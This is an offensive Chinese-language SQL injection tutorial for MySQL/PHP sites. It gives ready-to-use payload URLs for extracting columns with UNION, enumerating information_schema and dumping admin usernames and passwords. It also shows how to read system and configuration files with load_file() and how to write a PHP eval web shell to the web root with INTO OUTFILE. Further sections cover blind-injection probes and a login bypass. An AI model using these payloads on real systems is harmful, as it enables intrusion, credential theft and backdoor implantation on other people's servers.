关于mysql手工注入的详细解析和information_schema表的作用。
基础文章, by whoami.
mysql

4.0以上支持union

4.1以上支持子查询

5.0以上有了系统表

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点.

判断字段大小:接下来,对付php猜字段的方法,我们用order by.语法如下:

CODE:
http://127.0.0.1/1.php?id=1order by 40 //如果返回正常,说明实际的字段要比40大.那么我们继续加.一直加到返回错误.

CODE:
譬如当http://127.0.0.1/1.php?id=1order by 4
5的时候出错了,那么我们就知道字段大小为4.

UNION SELECT:知道字段大小以后,我们就用union select联合查询来列出所有字段.

CODE:
http://127.0.0.1/1.php?id=1and 1=2 union select 1,2,3,4~44/* //这里我们列出了44个字段,并且以/*告诉MYSQL,我们的命令已经执行完毕.

你就可以在回显出来的相应的字段上,替换你要查询的字段名,再from表明.就可以得到相应的字段内容了.譬如:

CODE:
http://127.0.0.1/1.php?id=1and1=2 union select 1,2,3,4,~30,passwd,32,~45 from member/* //~表示我这里省略.你不能那么写.

几个常用的MYSQL函数:好了,现在我们把字段都列出来了.估计这时候有人就该急急忙忙的加from来猜密码了.实际上,猜测密码走后台这一招,我们应 该放在最后.有人说MYSQL的功能,和ACCESS一样,甚至还不如,这其实是误解,冤枉了MYSQL.我们下面来看看,MYSQL都有些什么高级的运 用.
这里首先列出几个常用的涵数:

1:system_user()

2:user()   返回MYSQL用户名

3:current_user()

4:session_user()

5:database()  返回当前数据库名

6:version()   返回当前数据库版本信息

7:load_file()   返回文件的内容

他们的含义分别如下:

1:系统用户名.2:用户名.3:当前用户名:4连接数据库的用户名.5:数据库名.6:数据库版本.7:MYSQL读取本地文件的函数

他们都有什么用?1-6的作用如下:

这几个函数翻回来的信息在检测过程中具有非常重要的作用,他们对我们了解目标,分析目标,寻找漏洞,开阔思路等等都有莫大的作用.譬如了解系统的版本,了解数据库是否支持union,当前用户是否ROOT用户的初步判断等等...函数7的作用就更大了,我们接下来单独说.

专说load_file()函数的作用与技巧.
OK.load_file是MYSQL用来读取本地文件时,会用到的函数.在我们注入时的权限可以读写文件时,load_file就有无比巨大的作用了. 怎么判断有我们注入点的权限呢?很简单,在注入点后加上and (select count(*) from mysql.user)>0/*如果结果返回正常,那么就是具有读写权限了.我们就可以用这个函数去读取系统的敏感文件,去寻找配置文件,寻找数据 库连接文件,寻找社工文件,寻找WEB物理路径等等.下面,我给大家总结出了敏感文件列表:
WINDOWS下:
load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)) c:/windows/php.ini //里面有什么不用我说了吧?
load_file(char(99,58,47,119,105,110,110,116,47,112,104,112,46,105,110,105)) c:/winnt/php.ini
load_file(char(99,58,47,119,105,110,100,111,119,115,47,109,121,46,105,110,105)) c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名
load_file(char(99,58,47,119,105,110,110,116,47,109,121,46,105,110,105)) c:/winnt/my.ini
load_file(char(99,58,47,98,111,111,116,46,105,110,105)) c:/boot.ini

LUNIX/UNIX下:
load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100)) /etc/password //不用我说了 吧?===============================================================load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录哦!
load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!
FreeBSD下:
load_file(char(47)) //列出了此FreeBSD系统的根目录

大概有朋友看到这里就该叫了,这都什么啊.char()是什么呀?后面一大串又是什么啊?(系统不明白的就不用问了,自己去GOOGLE).
实际上,就算你拥有读和写权限的一个注入点,如果你直接执行load_file(c:\boot.ini),一般都回显不了,遇到这样的情况,你有两个选择.

1把路径转为16进制,直接提交数据库.

2把路径转为10进制,用char()函数还原回ASCII.

譬如c:\boot.ini,转换为16进制就是:"0x633A5C626F6F742E696E69",然后你直接用 load_file(0x633A5C626F6F742E696E69)就可以了. 如果转换为10进制,那么就是:"99 58 92 98 111 111 116 46 105 110 105".你需要使用char()来转换,转换之前,你需要在TXT里做个批量替换,把空格都转为","号. 即:load_file(char(99,58,92,98,111,111,116,46,105,110,105)).注意不要少了扩号,都是对称 的.
说到这里,估计又有小菜要叫了..都弄好啦,放那里去执行啊?!别急,看看下图.

只要把load_file()放到页面出现的字段上,最好保证有足够位置能显示完你要显示的文件.实在没有足够位置也不紧张,下面我再教你几招.

1:有时候,你明明确认自己拥有读和写文件的权利,却硬是读不出来文件,或者一片空白.为什么?原因可能是对方的系统在权限配置上做的好,你的USER权 限,读不到他ADMINISTRATOR里的文件.NTFS和LINUX都能做到这点.如果你排除以上情况,你就要考虑,是不是你读出来的内容,被浏览器 当作HTML,ASP,PHP,ASPX,JSP等等的脚本语言给执行了?譬如你读出来的内容如果含有<>等符号,那么浏览器就会执行你的文 件内容,你自然什么都看不到.对付这样的情况,也很简单,我们只要把那些特殊的符号,在读出来的时候,用别的符号去代替他们,这样浏览器就不会去执行他们 了!怎么代替?我们有replace(load_file(A),char(60),char(32))函数在!当你读A文件出来的时候,如果里面 有"<",那么MYSQL会用" "去代替B,然后再显示出来.OK.我们这么一换上:replace(load_file(A)),char(60),char(32)).这里一样用的 CHAR()函数转换为字母即一旦出现"<"符号,就用空格来代替他.这样就能完整的回显内容给你了.

2:所有的字段位置都不够位置回显,读到的文件不完整哦,又不是上面的原因,那么怎么办呢?这里我们用Substring(str,pos,len)函数 解决问题.他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)就是把 A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.

into outfile的高级运用!
OK.load_file()我们就说那么多了.接下来,我们还有许多的重头戏要来呢!这里,我要说下一个很重要的运用方法,也正是我着重参考剑心几部作品的技术的部分.当我们确定如下几个条件以后:
1获得物理路径(into outfile '物理路径') 这样才能写对目录
2能够使用union (也就是说需要MYSQL3以上的版本)
3对方没有对 ' 进行过滤(因为outfile 后面的 ' ' 不可以用其他函数代替转换)
4就是MYSQL用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)
5对web目录有写权限MS的系统一般都有权限,但是LINUX通常都是rwxr-xr-x 也就是说组跟其他用户都没有权限写操作.

这里的1,我们一般可以靠数据库出错信息来爆出来,不行的话,也可以通过load_file()来得到.2那是一般都可以的了...3也不多见对'''过 滤的.4有没有权限,我们前面已经测试过的了.5如果不能备份到网站的路径上来,我们也还有别的办法,譬如到starup,run里面去等等社工的办法. 而且一般多试试上传目录,图片目录,还是大部分都有读写权限的.
OK.需要的条件确定了,那怎么用呢?我们分开两部来说用法.

用法1:这是中规中矩的用法,大家都知道.就是采用网站有的留言,上传等功能,把你的一句话马弄上去,然后使用

CODE:
http://www.tian6.com/coder.php?id=1and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile '/www/home/html/coder.php'/* 你的小马就诞生了.

其中/www/home/html/upload/qingyafengping.jpg为你已上传的木马地址.3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.

用法2,也是重点要说的.上面的方法,局限性还是比较大的,如果网站不给你上传,或者网站过滤上传的内容,那怎么办?不用怕,剑心早在几年前就给我们想到了个好办法.我们只需要直接这么执行URL:

CODE:
http://www.tiany6.com/coder.php?id=1and 1=2 union select 1,char(这里是你的马的代码,记得转为10进或者16进),3,4,5,6 into outfile '/www/home/html/coder.php'/* 这样你的小马也诞生了,不需要上传,也不怕他过滤.

譬如

CODE:
http://www.tiany6.com/coder.php?id=1and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'/*
或者
http://127.0.0.1/coder.php?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*
或者
http://127.0.0.1/coder.php?id=1 and 1=2 union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/www/home/html/coder.php'/*

3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.

小结:
1.判断是否存在注入,加';and 1=1;and 1=2

2.判断版本and ord(mid(version(),1,1))>51 /*返回正常说明是4.0以上版本,可以用union查询

3.利用order by 暴字段,在网址后加order by 10 /*如果返回正常说明字段大于10

4.再利用union来查询准确字段,如:and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替,and 1=2的作用是让前一句出错,使得服务器返回后一句执行结果

5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7.首先猜解user表,如:and 1=2 union select 1,2,3,4,5,6.... from user /*如果返回正常,说明存在这个表。

8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。

9.同理再猜解password字段,猜解成功再找后台登录。

10.登录后台,上传shell。

=========================================================

更改配置文件的位置:
mysqld-nt.exe --defaults-file=dir
例如:
mysqld --defaults-file="C:\MySql_5\my.ini"

==================================================================================

sql注入中常遇到mysql的数据库,其实apache+mysql+php权限还是比较高的,所以这类站点一旦拿下,可利用的价值是很高的。简单介绍针对MYSQL的数据库注入常用到的函数和系统数据库。
1、常用到的函数
     1.1 version()-----显示MYSQL的版本
         MYSQL4.0以上的版本支持union查询,默认有INFORMATION_SCHEMA数据库,INFORMATION_SCHEMA数据库数据库很有用。所以判断系统版本也比较重要。
     1.2 user()--------链接数据库的用户
          通过这个函数可以知道链接数据库的用户是什么,连接数据库的用户不同权限也就不同,如果有幸遇到是root用户,顺便能搞到密码,那就太爽了。
     1.3 database()----当前的数据库名称
         查看当前的数据库名,后面会用到。
2、有用的系统数据库INFORMATION_SCHEMA
关于INFORMATION_SCHEMA数据库,mysql大于5.0的版本默认安装后都有INFORMATION_SCHEMA数据 库,INFORMATION_SCHEMA提供了访问数据库元数据的方式,是MYSQL的信息数据库,其中保存着关于MySQL服务器所维护的所有其他数 据库的信息,通过这个数据库可以查看服务器上创建了那些数据库,数据库有哪些表,表中有哪些字段,对注入很有用途。
      2.1 查看数据库服务器上的数据库
SELECT 1,2,SCHEMA_NAME,4 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT N,1--
      2.2 查看某个数据库里面的数据表
SELECT 1,2,table_name,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='数据库名' LIMIT N,1--
      2.3 查看某个数据表里面的字段
SELECT 1,2,COLUMN_NAME,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name ='表名' AND table_schema ='数据库名' LIMIT N,1--
其中 N(从0开始) 表示第几条记录,可以依次查看,知道得到想要的结果,不加LIMIT N,1将列出全部或当前。每一句后最好加上--或/*,否则可能出错.

快速暴表(如果表太多显示不出来可以用substring)
http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where

table_schema=database()--

快速暴字段
http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where

table_name=表名的hex值--

双暴字段内容(0x3a 是:的意思)
http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5 from admin

简单介绍下这个结构:
+—————————————+
| Tables_in_information_schema |
+————————————------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名,
|                              关键字段:SCHEMA_NAME,表示数据库名称;
|TABLES ―------―>存储表名
|                             关键字段:TABLE_SCHEMA表示表所属的数据库名称;
                                                TABLE_NAME表示表的名称
| COLUMNS ----―>存储字段名
|                            关键字段:TABLE_SCHEMA表示表所属的数据库名称;
                                                 TABLE_NAME表示所属的表的名称
                                                 COLUMN_NAME表示字段名

==================================================================================

技巧:

用repalce函数将load_file结果中的 '<' (0x3c) 换成 ':' (0x3a)
http://www.hacked.cn/autocar/show.php?id=-42 and 1=3 union select replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

当version < 4 ,或者搜索型注入不能用union时,下面的方法很有用

/help.php?id=3 and ord(mid(version(),1,1))>51/* 看版本大于3不,支不支持union

/news/display.php?id=467 and (select char_length(user()) )%3E6 and 1=1-- 看总数

/help.php?id=3 and ord(mid(user(),1,1))=114/*,返回错误,说明不是root

/help.php?id=3 and (select count(*) from mysql.user)>0 /* 不是root没关系,看看有没有写权限

/news/display.php?id=467 and (select ascii( substr(user(),1,1)) )%3E32 and 1=1 --一个一个猜

/news/display.php?id=467 and (select count(*) from article_admin) and 1=1--猜表名,在当前数据库中

/help.php?id=3 and (select username from movie_admin) and 1=1--猜列名

/help.php?id=3 and (select char_length(username) from movie_admin)>4 and 1=1--猜列长度

/help.php?id=3 and (select ascii( substr(username,1,1)) from movie_admin)%3E96 and 1=1--猜列记录

/* %3E是>,这样一可以绕过防注入,二可以实现猜解(当无法爆的时候,里面的函数可以换成database(),version()等) */

a.php?action=search&keyword=a%25'+and+(select+length(load_file(0xAAAAA)))<=32+and+1=1+and+'%25'=' /* Loadfile()

a.php?action=search&keyword=a%25'+and+(select+ascii(substr(load_file(0xAAAAA),1,1)))<=256+and+1=1+and+'%25'='

如果有读文件权限的话,读取mysql连接文件,获得用户名密码,然后访问/phpmyadmin/,输入密码拿shell。

======================================================================

POST表单型PHP注入

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将 display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以 前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只需将提交的变量中的所有单引号、双 引号、反斜线和空字告符自动转换为含有反斜线的转义字符。如把“’”变成“\”,把“\”变成“\\”,就ok了。下面我们分为对 magic_quotes_gpc=off和magic_quotes_gpc=on的注入清况分析一下。 

我们先看一段有漏洞的php代码,这段代码是用来搜索的。

从上面代码中我们可以看出,是一个搜索表单,通过post提交数据,并进行select查询,

当然要分析这些漏洞我们得先掌握php语言和mysql语法。

如果我们从表单中提交% ' order by id #(#号在mysql中表示注释,不执行后面的sql语句),

或者用' order by id #,带入的sql语句就成了

select * from users where username like '% %' order by id # order by username



select * from users where username like '%' order by id # order by username

这样数据库的内容会全部返回,列出所有用户名,还有密码等。当然还有update 语句注入攻击、insert语句注入攻击等,最常用的是union语法注入,采用into outfile语句导出php脚本木马。 

首先要清楚一些mysql语句,如select load_file('c:/boot.ini')我们可以查看c盘下的boot.ini文件内容,在有注入点的网址后面加入该查询语句就可以显示出黑客 们想获得的敏感信息,如查看数据库的连接文件获得数据库帐号,查看etc/password信息等。Select * from table into outfile    "C:\\Inetpub\\ wwwroot\\shell.php";也就是从表中导出字符串到C:\Inetpub\wwwroot\shell.php中,

通常黑客们在得到mysql帐号的情况下,利用create table rose(cmd text);建立一个rose表,字段cmd为text类型,

然后用use rose;打开rose表,

insert into rose values("<?php eval ( $POST[cmd]) ;?> ")加入一句话马到字段里。

然后selec t * from rose in to outfile "C:\\Inetpub\\wwwroot\\shell. php ";将一句话木马导出为一个shell.php文件.

当magic_quotes_gpc=on时,提交变量中的所有单引号、双引号、反斜线和空字符会自动转换为含有反斜线的转义字符,字符型的注入可以防 范,但数字型没有用到单引号,字符型注入也可以通过char()将参数解释为整数,并返回由这些整数的ASCII码字符组成的一个字符串,也可以用16进 制来代替字符。

例如:在浏览器里输入http://localhost/www/admin/login.php?username=char(114,111,115,101)%23 

上面假设的我们知道的用户名是rose,转换成ASCII后是char(114,111,115,101),%23是#号,表注释。那么sql语句变 成:select * from   example where username=char(114,111,115,101)# and password=' ',后面的and password=' '被注释掉了,我们顺利进入后台。

======================================================================

1.and 1=2 union select 1,CONCAT(列名,0x7C,列名) from 表名/*

2.id[]=1暴路径

3.mysql5 : and 1=2 union select TABLE_SCHEMA,COLUMN_NAME from information_schema.STATISTICS/*

4.,CONCAT(0x5F46696C6553746172745F,load_file(0x433A5C626F6F742E696E69),0x5F46696C65456E645F)

========================================================================

information_schema:

1: KEY_COLUMN_USAGE表
constraint_schema: 存放数据库名
table_schema: 存放数据库名
table_name: 存放数据库表信息
column_name: 存放数据库的字段信息,一般可以获取第一个字段或者自增字段的信息

2: SCHEMA表
schema_name: 存放数据库名
default_charater_set_name: 存放charset类型
default_collation_name: 存放charset相关信息

3: SCHEMA_PRIVILEGES表
grantee: 存放数据库用户名
table_schema: 表名
privilege_type: 权限

4: STATISTICS表
table_schema: 存放数据库名
table_name: 存放表名
index_schema: 数据库名
index_name: 是否缩引?
column_name: 存放索引自增字段?

5: TABLES表

table_schema: 存放数据库名
table_name: 存放表名
table_type: 表类型 SYSTEM or BASE TABLE
engin: MEMORY MYISAM InnoDB
version:
table_rows:表的行数
auto_increment: 自增的总行数
create_time: 创建表的时间
update_time: 更新表的时间
create_options: 创建表时的约束条件
Back Top
 

原文地址:http://vdisk.weibo.com/s/536dc